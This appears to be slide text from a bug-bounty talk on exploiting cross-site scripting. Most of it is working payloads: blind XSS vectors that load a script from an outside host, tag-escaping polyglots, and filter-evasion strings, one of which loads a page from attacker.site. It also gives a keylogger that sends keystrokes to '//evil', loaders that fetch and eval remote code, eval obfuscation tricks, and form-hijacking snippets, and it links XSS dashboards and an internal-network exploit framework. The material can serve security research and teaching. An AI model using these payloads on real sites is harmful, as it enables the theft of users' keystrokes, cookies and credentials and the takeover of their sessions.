Хватит усложнять и перебирать бессмысленные вектора для эксплуатации XSS. Все проще.

1. I <"3 XSS
Security researcher
and your mother

4. Step 1
Create XSS payload

5. #bugbountytip
Try to send Blind XSS in feedback form…

6. Escaping? Close comment -->
‘>">
</style>
</div></article>
</script>
">
<script src=
https://securityz.net/1.js?>
Close attributes
Close tags
One more time just in case
Url to script source
83 symbols

7. Разбор вектора
--
>‘>"></style></div></article></script>
"><script
src=https://xxxxxxxxx.net/1.js?>
83 symbols
'"--></style></script>
<script src=//xxxxxxxxx.net/1.js>
55 symbols==

8. Where is the script running?

9. • <iframe>
• <noembed>
• <noscript>
• <style>
• <xmp>
• <script>
• <noframes>
• <textarea>
• <title>
• <plaintext>
• <template>
• <frameset>

10. • <iframe>
• <noembed>
• <noscript>
• <style>
• <xmp>
• <script>
• <noframes>
• <textarea>
• <title>
• <plaintext>
• <template>
• <frameset>

11. </noscript></style></script></textarea></title>

12. <img> VS <svg>
onError onLoad
+ src

13. <img src onerror=alert()>
<svg onload=alert()>
vs

16. What about protocols?

17. • <a href="XXX">Homepage</a>
• <iframe src="XXX"></iframe>

18. data:

19. data:

20. data:

21. #bugbountytip

22. data:
<script src=data:,alert()></script>
<link rel=import href=data:>

23. javascript:
javascript:alert()
(everything is simple)

24. Current protocol
//

25. Current protocol
http://example.com => <a href=//test> => http://test
https://example.com => <a href=//test> => https://test

26. ?)
<a href='//test'>click me</a>

29. #bugbountytip

30. ¼script¾alert(¢XSS¢)¼/script¾
<IMG SRC=java%00script:alert("XSS")>
<IMG SRC="javtascript:alert('XSS');">
<BODY onload!#$%&()*~+-
_.,:;?@[/|]^`=alert("XSS")>
<IMG SRC="livescript:alert('XSS')">
<BR SIZE="&{alert('XSS')}">
exp/*<A STYLE='noxss:noxss("*//*");
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<OBJECT TYPE="text/x-scriptlet"
DATA="http://attacker.site/xss.html"></OBJECT>
<object data="javascript:alert(XSS)">
#bugbountytip
Can still Flash? ActiveX? VBScript?

31. "> '> -->
==
"'-->

33. Polyglot by CRLF
javascript:"/*'/*`/*-->
</noscript></title></textarea></style>
</template></noembed></script>
<html "%0Aonmouseover=/*%26lt;svg/*/onload=alert()//>

34. Finally
"'--></noscript></style></script></textarea></title>
+
<img/src/onerror=alert()>

35. So

36. #bugbountytip

37. Step 2
Preparing a script

38. XHR

39. XHR
var xhr = new XMLHttpRequest();
xhr.open...
fetch(//evil)

40. Keylogger
<img src onerror='
onkeypress=
(e)=>{fetch("//evil?k="+String.fromCharCode(e.which))}
,this.remove()
'>

43. sendBeacon

44. Backticks
alert``
a = `my
favorite
js`

45. Repalce document
document.write()
document.documentElement.innerHTML=''
document.body.innerHTML=''

46. HTML5 History API
history.pushState(0, 0, '/login');

47. location.hash
eval(decodeURI(location.hash.slice(1)))
🤔

48. Get script
x=document.createElement('script')
x.src='//evil'
document.body.appendChild(x)

49. Get script
fetch('//evil').then(x=>x.text().then(eval))

50. Base64
atob('TXlUZXh0’)
==
MyText

51. Regexp
/MyText/.source
==
MyText

52. Regexp+Base64
atob(/TXlUZXh0/.source)
==
MyText

53. Regexp
document.cookie == document['cookie']
document['location']=javascript:alert()

54. window.name

55. window.name

56. Eval
eval
setTimeout
setInterval

57. Eval
Set.constructor`alertx281x29`()
Function`alertx281x29```
[]["filter"]["constructor"]("alert x281x29")``

58. Implicit conversions
window.name='=alert(123)'
window.onerror=eval;throw window.name

59. U need eval?
• document.body.innerHTML
• location.href

60. • document.getElementById
• document.getElementByName
• document.getElementsByTagName
• document.getElementsByClassName
• document.querySelector

61. document.querySelector(".name").value="Peter Winter"
document.getElementsByTagName("button")[0].click()
document.getElementsById("register")[0].submit()

62. • document.frames
• document.anchors
• document.images
• document.links
• document.forms

63. Step 3
PWN

64. https://github.com/mandatoryprogrammer/sonar.js
A framework for identifying and launching exploits against
internal network hosts. Works via WebRTC IP enumeration
combined with WebSockets and external resource fingerprinting.

65. https://github.com/niklasvh/html2canvas
The script allows you to take "screenshots" of webpages or parts
of it, directly on the users browser. The screenshot is based on
the DOM and as such may not be 100% accurate to the real
representation as it does not make an actual screenshot, but
builds the screenshot based on the information available on the
page.

66. Dashboard for XSS 
• https://github.com/mandatoryprogrammer/xsshunter
• https://github.com/Netflix-Skunkworks/sleepy-puppy
• https://github.com/psych0tr1a/elScripto
• https://github.com/ssl/ezXSS
• https://github.com/LewisArdern/bXSS

67. inspectlet.com

68. THANKS FOR ATTENTION